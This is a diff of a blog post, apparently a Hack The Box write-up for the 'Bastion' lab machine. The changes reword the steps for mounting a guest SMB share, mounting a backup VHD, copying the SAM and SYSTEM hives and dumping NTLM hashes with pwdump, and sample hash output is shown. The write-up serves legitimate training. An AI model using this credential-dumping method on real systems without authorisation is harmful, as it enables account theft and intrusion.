Maddosaurus/maddosaurus.github.io/_posts/2020-06-06-htb-bastion.md

 So let's look into the shares.
 First, let's mount the Backups share:
-`sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/` There's a Backup of a full client machine at `WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351`.
+`sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/` There's a Backup of a full client machine at `WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351` to be discovered.
-Could be worth a shot for NTLM hashes :3

 ## The Backup
-So copy that VHD (in case someone resets the box while you're snooping around) and mount it with
+This VHD, copied and then mounted on Linux enabled closer investigation:
 `sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/guest/`

-Next up: dumping the NTHash for the user.
-That can be done by copying SAM and SYSTEM from `C:\Windows\system32\config\`
-and then calling pwdump on it:
+With an unbooted Windows installation like this, it is possible to copy registry hives from `C:\Windows\system32\config\` and dump the NTHash for the users:
 ```
 apalax@raudfjorden:~/writeups/HTB/Labs/Bastion$ pwdump SYSTEM SAM
 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::